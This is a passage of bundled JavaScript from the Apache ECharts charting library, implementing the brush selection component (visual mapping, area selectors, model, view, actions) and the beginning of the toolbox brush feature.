brushComponentSpecifiedBtns);\n\n    removeDuplicate(brushTypes);\n\n    if (isNew && !brushTypes.length) {\n        brushTypes.push.apply(brushTypes, DEFAULT_TOOLBOX_BTNS);\n    }\n};\n\nfunction removeDuplicate(arr) {\n    var map$$1 = {};\n    each$1(arr, function (val) {\n        map$$1[val] = 1;\n    });\n    arr.length = 0;\n    each$1(map$$1, function (flag, val) {\n        arr.push(val);\n    });\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @file Visual solution, for consistent option specification.\n */\n\nvar each$23 = each$1;\n\nfunction hasKeys(obj) {\n    if (obj) {\n        for (var name in obj) {\n            if (obj.hasOwnProperty(name)) {\n                return true;\n            }\n        }\n    }\n}\n\n/**\n * @param {Object} option\n * @param {Array.<string>} stateList\n * @param {Function} [supplementVisualOption]\n * @return {Object} visualMappings <state, <visualType, module:echarts/visual/VisualMapping>>\n */\nfunction createVisualMappings(option, stateList, supplementVisualOption) {\n    var visualMappings = {};\n\n    each$23(stateList, function (state) {\n        var mappings = visualMappings[state] = createMappings();\n\n        each$23(option[state], function (visualData, visualType) {\n            if (!VisualMapping.isValidType(visualType)) {\n                return;\n            }\n            var mappingOption = {\n                type: visualType,\n                visual: visualData\n            };\n            supplementVisualOption && supplementVisualOption(mappingOption, state);\n            mappings[visualType] = new VisualMapping(mappingOption);\n\n            // Prepare a alpha for opacity, for some case that opacity\n            // is not supported, such as rendering using gradient color.\n            if (visualType === 'opacity') {\n                mappingOption = clone(mappingOption);\n                mappingOption.type = 'colorAlpha';\n                mappings.__hidden.__alphaForOpacity = new VisualMapping(mappingOption);\n            }\n        });\n    });\n\n    return visualMappings;\n\n    function createMappings() {\n        var Creater = function () {};\n        // Make sure hidden fields will not be visited by\n        // object iteration (with hasOwnProperty checking).\n        Creater.prototype.__hidden = Creater.prototype;\n        var obj = new Creater();\n        return obj;\n    }\n}\n\n/**\n * @param {Object} thisOption\n * @param {Object} newOption\n * @param {Array.<string>} keys\n */\nfunction replaceVisualOption(thisOption, newOption, keys) {\n    // Visual attributes merge is not supported, otherwise it\n    // brings overcomplicated merge logic. See #2853. So if\n    // newOption has anyone of these keys, all of these keys\n    // will be reset. Otherwise, all keys remain.\n    var has;\n    each$1(keys, function (key) {\n        if (newOption.hasOwnProperty(key) && hasKeys(newOption[key])) {\n            has = true;\n        }\n    });\n    has && each$1(keys, function (key) {\n        if (newOption.hasOwnProperty(key) && hasKeys(newOption[key])) {\n            thisOption[key] = clone(newOption[key]);\n        }\n        else {\n            delete thisOption[key];\n        }\n    });\n}\n\n/**\n * @param {Array.<string>} stateList\n * @param {Object} visualMappings <state, Object.<visualType, module:echarts/visual/VisualMapping>>\n * @param {module:echarts/data/List} list\n * @param {Function} getValueState param: valueOrIndex, return: state.\n * @param {object} [scope] Scope for getValueState\n * @param {string} [dimension] Concrete dimension, if used.\n */\n// ???! handle brush?\nfunction applyVisual(stateList, visualMappings, data, getValueState, scope, dimension) {\n    var visualTypesMap = {};\n    each$1(stateList, function (state) {\n        var visualTypes = VisualMapping.prepareVisualTypes(visualMappings[state]);\n        visualTypesMap[state] = visualTypes;\n    });\n\n    var dataIndex;\n\n    function getVisual(key) {\n        return data.getItemVisual(dataIndex, key);\n    }\n\n    function setVisual(key, value) {\n        data.setItemVisual(dataIndex, key, value);\n    }\n\n    if (dimension == null) {\n        data.each(eachItem);\n    }\n    else {\n        data.each([dimension], eachItem);\n    }\n\n    function eachItem(valueOrIndex, index) {\n        dataIndex = dimension == null ? valueOrIndex : index;\n\n        var rawDataItem = data.getRawDataItem(dataIndex);\n        // Consider performance\n        if (rawDataItem && rawDataItem.visualMap === false) {\n            return;\n        }\n\n        var valueState = getValueState.call(scope, valueOrIndex);\n        var mappings = visualMappings[valueState];\n        var visualTypes = visualTypesMap[valueState];\n\n        for (var i = 0, len = visualTypes.length; i < len; i++) {\n            var type = visualTypes[i];\n            mappings[type] && mappings[type].applyVisual(\n                valueOrIndex, getVisual, setVisual\n            );\n        }\n    }\n}\n\n/**\n * @param {module:echarts/data/List} data\n * @param {Array.<string>} stateList\n * @param {Object} visualMappings <state, Object.<visualType, module:echarts/visual/VisualMapping>>\n * @param {Function} getValueState param: valueOrIndex, return: state.\n * @param {number} [dim] dimension or dimension index.\n */\nfunction incrementalApplyVisual(stateList, visualMappings, getValueState, dim) {\n    var visualTypesMap = {};\n    each$1(stateList, function (state) {\n        var visualTypes = VisualMapping.prepareVisualTypes(visualMappings[state]);\n        visualTypesMap[state] = visualTypes;\n    });\n\n    function progress(params, data) {\n        if (dim != null) {\n            dim = data.getDimension(dim);\n        }\n\n        function getVisual(key) {\n            return data.getItemVisual(dataIndex, key);\n        }\n\n        function setVisual(key, value) {\n            data.setItemVisual(dataIndex, key, value);\n        }\n\n        var dataIndex;\n        while ((dataIndex = params.next()) != null) {\n            var rawDataItem = data.getRawDataItem(dataIndex);\n\n            // Consider performance\n            if (rawDataItem && rawDataItem.visualMap === false) {\n                continue;\n            }\n\n            var value = dim != null\n                ? data.get(dim, dataIndex, true)\n                : dataIndex;\n\n            var valueState = getValueState(value);\n            var mappings = visualMappings[valueState];\n            var visualTypes = visualTypesMap[valueState];\n\n            for (var i = 0, len = visualTypes.length; i < len; i++) {\n                var type = visualTypes[i];\n                mappings[type] && mappings[type].applyVisual(value, getVisual, setVisual);\n            }\n        }\n    }\n\n    return {progress: progress};\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Key of the first level is brushType: `line`, `rect`, `polygon`.\n// Key of the second level is chart element type: `point`, `rect`.\n// See moudule:echarts/component/helper/BrushController\n// function param:\n//      {Object} itemLayout fetch from data.getItemLayout(dataIndex)\n//      {Object} selectors {point: selector, rect: selector, ...}\n//      {Object} area {range: [[], [], ..], boudingRect}\n// function return:\n//      {boolean} Whether in the given brush.\nvar selector = {\n    lineX: getLineSelectors(0),\n    lineY: getLineSelectors(1),\n    rect: {\n        point: function (itemLayout, selectors, area) {\n            return itemLayout && area.boundingRect.contain(itemLayout[0], itemLayout[1]);\n        },\n        rect: function (itemLayout, selectors, area) {\n            return itemLayout && area.boundingRect.intersect(itemLayout);\n        }\n    },\n    polygon: {\n        point: function (itemLayout, selectors, area) {\n            return itemLayout\n                && area.boundingRect.contain(itemLayout[0], itemLayout[1])\n                && contain$1(area.range, itemLayout[0], itemLayout[1]);\n        },\n        rect: function (itemLayout, selectors, area) {\n            var points = area.range;\n\n            if (!itemLayout || points.length <= 1) {\n                return false;\n            }\n\n            var x = itemLayout.x;\n            var y = itemLayout.y;\n            var width = itemLayout.width;\n            var height = itemLayout.height;\n            var p = points[0];\n\n            if (contain$1(points, x, y)\n                || contain$1(points, x + width, y)\n                || contain$1(points, x, y + height)\n                || contain$1(points, x + width, y + height)\n                || BoundingRect.create(itemLayout).contain(p[0], p[1])\n                || linePolygonIntersect(x, y, x + width, y, points)\n                || linePolygonIntersect(x, y, x, y + height, points)\n                || linePolygonIntersect(x + width, y, x + width, y + height, points)\n                || linePolygonIntersect(x, y + height, x + width, y + height, points)\n            ) {\n                return true;\n            }\n        }\n    }\n};\n\nfunction getLineSelectors(xyIndex) {\n    var xy = ['x', 'y'];\n    var wh = ['width', 'height'];\n\n    return {\n        point: function (itemLayout, selectors, area) {\n            if (itemLayout) {\n                var range = area.range;\n                var p = itemLayout[xyIndex];\n                return inLineRange(p, range);\n            }\n        },\n        rect: function (itemLayout, selectors, area) {\n            if (itemLayout) {\n                var range = area.range;\n                var layoutRange = [\n                    itemLayout[xy[xyIndex]],\n                    itemLayout[xy[xyIndex]] + itemLayout[wh[xyIndex]]\n                ];\n                layoutRange[1] < layoutRange[0] && layoutRange.reverse();\n                return inLineRange(layoutRange[0], range)\n                    || inLineRange(layoutRange[1], range)\n                    || inLineRange(range[0], layoutRange)\n                    || inLineRange(range[1], layoutRange);\n            }\n        }\n    };\n}\n\nfunction inLineRange(p, range) {\n    return range[0] <= p && p <= range[1];\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar STATE_LIST = ['inBrush', 'outOfBrush'];\nvar DISPATCH_METHOD = '__ecBrushSelect';\nvar DISPATCH_FLAG = '__ecInBrushSelectEvent';\nvar PRIORITY_BRUSH = PRIORITY.VISUAL.BRUSH;\n\n/**\n * Layout for visual, the priority higher than other layout, and before brush visual.\n */\nregisterLayout(PRIORITY_BRUSH, function (ecModel, api, payload) {\n    ecModel.eachComponent({mainType: 'brush'}, function (brushModel) {\n        payload && payload.type === 'takeGlobalCursor' && brushModel.setBrushOption(\n            payload.key === 'brush' ? payload.brushOption : {brushType: false}\n        );\n    });\n    layoutCovers(ecModel);\n});\n\nfunction layoutCovers(ecModel) {\n    ecModel.eachComponent({mainType: 'brush'}, function (brushModel) {\n        var brushTargetManager = brushModel.brushTargetManager = new BrushTargetManager(brushModel.option, ecModel);\n        brushTargetManager.setInputRanges(brushModel.areas, ecModel);\n    });\n}\n\n/**\n * Register the visual encoding if this modules required.\n */\nregisterVisual(PRIORITY_BRUSH, function (ecModel, api, payload) {\n\n    var brushSelected = [];\n    var throttleType;\n    var throttleDelay;\n\n    ecModel.eachComponent({mainType: 'brush'}, function (brushModel, brushIndex) {\n\n        var thisBrushSelected = {\n            brushId: brushModel.id,\n            brushIndex: brushIndex,\n            brushName: brushModel.name,\n            areas: clone(brushModel.areas),\n            selected: []\n        };\n        // Every brush component exists in event params, convenient\n        // for user to find by index.\n        brushSelected.push(thisBrushSelected);\n\n        var brushOption = brushModel.option;\n        var brushLink = brushOption.brushLink;\n        var linkedSeriesMap = [];\n        var selectedDataIndexForLink = [];\n        var rangeInfoBySeries = [];\n        var hasBrushExists = 0;\n\n        if (!brushIndex) { // Only the first throttle setting works.\n            throttleType = brushOption.throttleType;\n            throttleDelay = brushOption.throttleDelay;\n        }\n\n        // Add boundingRect and selectors to range.\n        var areas = map(brushModel.areas, function (area) {\n            return bindSelector(\n                defaults(\n                    {boundingRect: boundingRectBuilders[area.brushType](area)},\n                    area\n                )\n            );\n        });\n\n        var visualMappings = createVisualMappings(\n            brushModel.option, STATE_LIST, function (mappingOption) {\n                mappingOption.mappingMethod = 'fixed';\n            }\n        );\n\n        isArray(brushLink) && each$1(brushLink, function (seriesIndex) {\n            linkedSeriesMap[seriesIndex] = 1;\n        });\n\n        function linkOthers(seriesIndex) {\n            return brushLink === 'all' || linkedSeriesMap[seriesIndex];\n        }\n\n        // If no supported brush or no brush on the series,\n        // all visuals should be in original state.\n        function brushed(rangeInfoList) {\n            return !!rangeInfoList.length;\n        }\n\n        /**\n         * Logic for each series: (If the logic has to be modified one day, do it carefully!)\n         *\n         * ( brushed ┬ && ┬hasBrushExist ┬ && linkOthers  ) => StepA: ┬record, ┬ StepB: ┬visualByRecord.\n         *   !brushed┘    ├hasBrushExist ┤                            └nothing,┘        ├visualByRecord.\n         *                └!hasBrushExist┘                                              └nothing.\n         * ( !brushed  && ┬hasBrushExist ┬ && linkOthers  ) => StepA:  nothing,  StepB: ┬visualByRecord.\n         *                └!hasBrushExist┘                                              └nothing.\n         * ( brushed ┬ &&                     !linkOthers ) => StepA:  nothing,  StepB: ┬visualByCheck.\n         *   !brushed┘                                                                  └nothing.\n         * ( !brushed  &&                     !linkOthers ) => StepA:  nothing,  StepB:  nothing.\n         */\n\n        // Step A\n        ecModel.eachSeries(function (seriesModel, seriesIndex) {\n            var rangeInfoList = rangeInfoBySeries[seriesIndex] = [];\n\n            seriesModel.subType === 'parallel'\n                ? stepAParallel(seriesModel, seriesIndex, rangeInfoList)\n                : stepAOthers(seriesModel, seriesIndex, rangeInfoList);\n        });\n\n        function stepAParallel(seriesModel, seriesIndex) {\n            var coordSys = seriesModel.coordinateSystem;\n            hasBrushExists |= coordSys.hasAxisBrushed();\n\n            linkOthers(seriesIndex) && coordSys.eachActiveState(\n                seriesModel.getData(),\n                function (activeState, dataIndex) {\n                    activeState === 'active' && (selectedDataIndexForLink[dataIndex] = 1);\n                }\n            );\n        }\n\n        function stepAOthers(seriesModel, seriesIndex, rangeInfoList) {\n            var selectorsByBrushType = getSelectorsByBrushType(seriesModel);\n            if (!selectorsByBrushType || brushModelNotControll(brushModel, seriesIndex)) {\n                return;\n            }\n\n            each$1(areas, function (area) {\n                selectorsByBrushType[area.brushType]\n                    && brushModel.brushTargetManager.controlSeries(area, seriesModel, ecModel)\n                    && rangeInfoList.push(area);\n                hasBrushExists |= brushed(rangeInfoList);\n            });\n\n            if (linkOthers(seriesIndex) && brushed(rangeInfoList)) {\n                var data = seriesModel.getData();\n                data.each(function (dataIndex) {\n                    if (checkInRange(selectorsByBrushType, rangeInfoList, data, dataIndex)) {\n                        selectedDataIndexForLink[dataIndex] = 1;\n                    }\n                });\n            }\n        }\n\n        // Step B\n        ecModel.eachSeries(function (seriesModel, seriesIndex) {\n            var seriesBrushSelected = {\n                seriesId: seriesModel.id,\n                seriesIndex: seriesIndex,\n                seriesName: seriesModel.name,\n                dataIndex: []\n            };\n            // Every series exists in event params, convenient\n            // for user to find series by seriesIndex.\n            thisBrushSelected.selected.push(seriesBrushSelected);\n\n            var selectorsByBrushType = getSelectorsByBrushType(seriesModel);\n            var rangeInfoList = rangeInfoBySeries[seriesIndex];\n\n            var data = seriesModel.getData();\n            var getValueState = linkOthers(seriesIndex)\n                ? function (dataIndex) {\n                    return selectedDataIndexForLink[dataIndex]\n                        ? (seriesBrushSelected.dataIndex.push(data.getRawIndex(dataIndex)), 'inBrush')\n                        : 'outOfBrush';\n                }\n                : function (dataIndex) {\n                    return checkInRange(selectorsByBrushType, rangeInfoList, data, dataIndex)\n                        ? (seriesBrushSelected.dataIndex.push(data.getRawIndex(dataIndex)), 'inBrush')\n                        : 'outOfBrush';\n                };\n\n            // If no supported brush or no brush, all visuals are in original state.\n            (linkOthers(seriesIndex) ? hasBrushExists : brushed(rangeInfoList))\n                && applyVisual(\n                    STATE_LIST, visualMappings, data, getValueState\n                );\n        });\n\n    });\n\n    dispatchAction(api, throttleType, throttleDelay, brushSelected, payload);\n});\n\nfunction dispatchAction(api, throttleType, throttleDelay, brushSelected, payload) {\n    // This event will not be triggered when `setOpion`, otherwise dead lock may\n    // triggered when do `setOption` in event listener, which we do not find\n    // satisfactory way to solve yet. Some considered resolutions:\n    // (a) Diff with prevoius selected data ant only trigger event when changed.\n    // But store previous data and diff precisely (i.e., not only by dataIndex, but\n    // also detect value changes in selected data) might bring complexity or fragility.\n    // (b) Use spectial param like `silent` to suppress event triggering.\n    // But such kind of volatile param may be weird in `setOption`.\n    if (!payload) {\n        return;\n    }\n\n    var zr = api.getZr();\n    if (zr[DISPATCH_FLAG]) {\n        return;\n    }\n\n    if (!zr[DISPATCH_METHOD]) {\n        zr[DISPATCH_METHOD] = doDispatch;\n    }\n\n    var fn = createOrUpdate(zr, DISPATCH_METHOD, throttleDelay, throttleType);\n\n    fn(api, brushSelected);\n}\n\nfunction doDispatch(api, brushSelected) {\n    if (!api.isDisposed()) {\n        var zr = api.getZr();\n        zr[DISPATCH_FLAG] = true;\n        api.dispatchAction({\n            type: 'brushSelect',\n            batch: brushSelected\n        });\n        zr[DISPATCH_FLAG] = false;\n    }\n}\n\nfunction checkInRange(selectorsByBrushType, rangeInfoList, data, dataIndex) {\n    for (var i = 0, len = rangeInfoList.length; i < len; i++) {\n        var area = rangeInfoList[i];\n        if (selectorsByBrushType[area.brushType](\n            dataIndex, data, area.selectors, area\n        )) {\n            return true;\n        }\n    }\n}\n\nfunction getSelectorsByBrushType(seriesModel) {\n    var brushSelector = seriesModel.brushSelector;\n    if (isString(brushSelector)) {\n        var sels = [];\n        each$1(selector, function (selectorsByElementType, brushType) {\n            sels[brushType] = function (dataIndex, data, selectors, area) {\n                var itemLayout = data.getItemLayout(dataIndex);\n                return selectorsByElementType[brushSelector](itemLayout, selectors, area);\n            };\n        });\n        return sels;\n    }\n    else if (isFunction$1(brushSelector)) {\n        var bSelector = {};\n        each$1(selector, function (sel, brushType) {\n            bSelector[brushType] = brushSelector;\n        });\n        return bSelector;\n    }\n    return brushSelector;\n}\n\nfunction brushModelNotControll(brushModel, seriesIndex) {\n    var seriesIndices = brushModel.option.seriesIndex;\n    return seriesIndices != null\n        && seriesIndices !== 'all'\n        && (\n            isArray(seriesIndices)\n            ? indexOf(seriesIndices, seriesIndex) < 0\n            : seriesIndex !== seriesIndices\n        );\n}\n\nfunction bindSelector(area) {\n    var selectors = area.selectors = {};\n    each$1(selector[area.brushType], function (selFn, elType) {\n        // Do not use function binding or curry for performance.\n        selectors[elType] = function (itemLayout) {\n            return selFn(itemLayout, selectors, area);\n        };\n    });\n    return area;\n}\n\nvar boundingRectBuilders = {\n\n    lineX: noop,\n\n    lineY: noop,\n\n    rect: function (area) {\n        return getBoundingRectFromMinMax(area.range);\n    },\n\n    polygon: function (area) {\n        var minMax;\n        var range = area.range;\n\n        for (var i = 0, len = range.length; i < len; i++) {\n            minMax = minMax || [[Infinity, -Infinity], [Infinity, -Infinity]];\n            var rg = range[i];\n            rg[0] < minMax[0][0] && (minMax[0][0] = rg[0]);\n            rg[0] > minMax[0][1] && (minMax[0][1] = rg[0]);\n            rg[1] < minMax[1][0] && (minMax[1][0] = rg[1]);\n            rg[1] > minMax[1][1] && (minMax[1][1] = rg[1]);\n        }\n\n        return minMax && getBoundingRectFromMinMax(minMax);\n    }\n};\n\nfunction getBoundingRectFromMinMax(minMax) {\n    return new BoundingRect(\n        minMax[0][0],\n        minMax[1][0],\n        minMax[0][1] - minMax[0][0],\n        minMax[1][1] - minMax[1][0]\n    );\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar DEFAULT_OUT_OF_BRUSH_COLOR = ['#ddd'];\n\nvar BrushModel = extendComponentModel({\n\n    type: 'brush',\n\n    dependencies: ['geo', 'grid', 'xAxis', 'yAxis', 'parallel', 'series'],\n\n    /**\n     * @protected\n     */\n    defaultOption: {\n        // inBrush: null,\n        // outOfBrush: null,\n        toolbox: null,          // Default value see preprocessor.\n        brushLink: null,        // Series indices array, broadcast using dataIndex.\n                                // or 'all', which means all series. 'none' or null means no series.\n        seriesIndex: 'all',     // seriesIndex array, specify series controlled by this brush component.\n        geoIndex: null,         //\n        xAxisIndex: null,\n        yAxisIndex: null,\n\n        brushType: 'rect',      // Default brushType, see BrushController.\n        brushMode: 'single',    // Default brushMode, 'single' or 'multiple'\n        transformable: true,    // Default transformable.\n        brushStyle: {           // Default brushStyle\n            borderWidth: 1,\n            color: 'rgba(120,140,180,0.3)',\n            borderColor: 'rgba(120,140,180,0.8)'\n        },\n\n        throttleType: 'fixRate', // Throttle in brushSelected event. 'fixRate' or 'debounce'.\n                                 // If null, no throttle. Valid only in the first brush component\n        throttleDelay: 0,        // Unit: ms, 0 means every event will be triggered.\n\n        // FIXME\n        // 试验效果\n        removeOnClick: true,\n\n        z: 10000\n    },\n\n    /**\n     * @readOnly\n     * @type {Array.<Object>}\n     */\n    areas: [],\n\n    /**\n     * Current activated brush type.\n     * If null, brush is inactived.\n     * see module:echarts/component/helper/BrushController\n     * @readOnly\n     * @type {string}\n     */\n    brushType: null,\n\n    /**\n     * Current brush opt.\n     * see module:echarts/component/helper/BrushController\n     * @readOnly\n     * @type {Object}\n     */\n    brushOption: {},\n\n    /**\n     * @readOnly\n     * @type {Array.<Object>}\n     */\n    coordInfoList: [],\n\n    optionUpdated: function (newOption, isInit) {\n        var thisOption = this.option;\n\n        !isInit && replaceVisualOption(\n            thisOption, newOption, ['inBrush', 'outOfBrush']\n        );\n\n        var inBrush = thisOption.inBrush = thisOption.inBrush || {};\n        // Always give default visual, consider setOption at the second time.\n        thisOption.outOfBrush = thisOption.outOfBrush || {color: DEFAULT_OUT_OF_BRUSH_COLOR};\n\n        if (!inBrush.hasOwnProperty('liftZ')) {\n            // Bigger than the highlight z lift, otherwise it will\n            // be effected by the highlight z when brush.\n            inBrush.liftZ = 5;\n        }\n    },\n\n    /**\n     * If ranges is null/undefined, range state remain.\n     *\n     * @param {Array.<Object>} [ranges]\n     */\n    setAreas: function (areas) {\n        if (__DEV__) {\n            assert$1(isArray(areas));\n            each$1(areas, function (area) {\n                assert$1(area.brushType, 'Illegal areas');\n            });\n        }\n\n        // If ranges is null/undefined, range state remain.\n        // This helps user to dispatchAction({type: 'brush'}) with no areas\n        // set but just want to get the current brush select info from a `brush` event.\n        if (!areas) {\n            return;\n        }\n\n        this.areas = map(areas, function (area) {\n            return generateBrushOption(this.option, area);\n        }, this);\n    },\n\n    /**\n     * see module:echarts/component/helper/BrushController\n     * @param {Object} brushOption\n     */\n    setBrushOption: function (brushOption) {\n        this.brushOption = generateBrushOption(this.option, brushOption);\n        this.brushType = this.brushOption.brushType;\n    }\n\n});\n\nfunction generateBrushOption(option, brushOption) {\n    return merge(\n        {\n            brushType: option.brushType,\n            brushMode: option.brushMode,\n            transformable: option.transformable,\n            brushStyle: new Model(option.brushStyle).getItemStyle(),\n            removeOnClick: option.removeOnClick,\n            z: option.z\n        },\n        brushOption,\n        true\n    );\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendComponentView({\n\n    type: 'brush',\n\n    init: function (ecModel, api) {\n\n        /**\n         * @readOnly\n         * @type {module:echarts/model/Global}\n         */\n        this.ecModel = ecModel;\n\n        /**\n         * @readOnly\n         * @type {module:echarts/ExtensionAPI}\n         */\n        this.api = api;\n\n        /**\n         * @readOnly\n         * @type {module:echarts/component/brush/BrushModel}\n         */\n        this.model;\n\n        /**\n         * @private\n         * @type {module:echarts/component/helper/BrushController}\n         */\n        (this._brushController = new BrushController(api.getZr()))\n            .on('brush', bind(this._onBrush, this))\n            .mount();\n    },\n\n    /**\n     * @override\n     */\n    render: function (brushModel) {\n        this.model = brushModel;\n        return updateController.apply(this, arguments);\n    },\n\n    /**\n     * @override\n     */\n    updateTransform: function (brushModel, ecModel) {\n        // PENDING: `updateTransform` is a little tricky, whose layout need\n        // to be calculate mandatorily and other stages will not be performed.\n        // Take care the correctness of the logic. See #11754 .\n        layoutCovers(ecModel);\n        return updateController.apply(this, arguments);\n    },\n\n    /**\n     * @override\n     */\n    updateView: updateController,\n\n    // /**\n    //  * @override\n    //  */\n    // updateLayout: updateController,\n\n    // /**\n    //  * @override\n    //  */\n    // updateVisual: updateController,\n\n    /**\n     * @override\n     */\n    dispose: function () {\n        this._brushController.dispose();\n    },\n\n    /**\n     * @private\n     */\n    _onBrush: function (areas, opt) {\n        var modelId = this.model.id;\n\n        this.model.brushTargetManager.setOutputRanges(areas, this.ecModel);\n\n        // Action is not dispatched on drag end, because the drag end\n        // emits the same params with the last drag move event, and\n        // may have some delay when using touch pad, which makes\n        // animation not smooth (when using debounce).\n        (!opt.isEnd || opt.removeOnClick) && this.api.dispatchAction({\n            type: 'brush',\n            brushId: modelId,\n            areas: clone(areas),\n            $from: modelId\n        });\n        opt.isEnd && this.api.dispatchAction({\n            type: 'brushEnd',\n            brushId: modelId,\n            areas: clone(areas),\n            $from: modelId\n        });\n    }\n\n});\n\nfunction updateController(brushModel, ecModel, api, payload) {\n    // Do not update controller when drawing.\n    (!payload || payload.$from !== brushModel.id) && this._brushController\n        .setPanels(brushModel.brushTargetManager.makePanelOpts(api))\n        .enableBrush(brushModel.brushOption)\n        .updateCovers(brushModel.areas.slice());\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * payload: {\n *      brushIndex: number, or,\n *      brushId: string, or,\n *      brushName: string,\n *      globalRanges: Array\n * }\n */\nregisterAction(\n        {type: 'brush', event: 'brush' /*, update: 'updateView' */},\n    function (payload, ecModel) {\n        ecModel.eachComponent({mainType: 'brush', query: payload}, function (brushModel) {\n            brushModel.setAreas(payload.areas);\n        });\n    }\n);\n\n/**\n * payload: {\n *      brushComponents: [\n *          {\n *              brushId,\n *              brushIndex,\n *              brushName,\n *              series: [\n *                  {\n *                      seriesId,\n *                      seriesIndex,\n *                      seriesName,\n *                      rawIndices: [21, 34, ...]\n *                  },\n *                  ...\n *              ]\n *          },\n *          ...\n *      ]\n * }\n */\nregisterAction(\n    {type: 'brushSelect', event: 'brushSelected', update: 'none'},\n    function () {}\n);\n\nregisterAction(\n    {type: 'brushEnd', event: 'brushEnd', update: 'none'},\n    function () {}\n);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar brushLang = lang.toolbox.brush;\n\nfunction Brush(model, ecModel, api) {\n    this.model = model;\n    this.ecModel = ecModel;\n    this.api = api;\n\n    /**\n     * @private\n     * @type {string}\n     */\n    this._brushType;\n\n    /**\n     * @private\n     * @type {string}\n     */\n    this._brushMode;\n}\n\nBrush.defaultOption = {\n    show: true,\n    type: ['rect', 'polygon', 'lineX', 'lineY', 'keep', 'clear'],\n    icon: {\n        /* eslint-disable */\n        rect: 'M7.3,34.7 M0.4,10V-0.2h9.8 M89.6,10V-0.2h-9.8 M0.4,60v10.2h9.8 M89.6,60v10.2h-9.8 M12.3,22.4V10.5h13.1 M33.6,10.5h7.8 M49.1,10.5h7.8 M77.5,22.4V10.5h-13 M12.3,31.1v8.2 M77.7,31.1v8.2 M12.3,47.6v11.9h13.1 M33.6,59.5h7.6 M49.1,59.5 h7.7 M77.5,47.6v11.9h-13', // jshint ignore:line\n        polygon: 'M55.2,34.9c1.7,0,3.1,1.4,3.1,3.1s-1.4,3.1-3.1,3.1 s-3.1-1.4-3.1-3.1S53.5,34.9,55.2,34.9z M50.4,51c1.7,0,3.1,1.4,3.1,3.1c0,1.7-1.4,3.1-3.1,3.1c-1.7,0-3.1-1.4-3.1-3.1 C47.3,52.4,48.7,51,50.4,51z M55.6,37.1l1.5-7.8 M60.1,13.5l1.6-8.7l-7.8,4 M59,19l-1,5.3 M24,16.1l6.4,4.9l6.4-3.3 M48.5,11.6 l-5.9,3.1 M19.1,12.8L9.7,5.1l1.1,7.7 M13.4,29.8l1,7.3l6.6,1.6 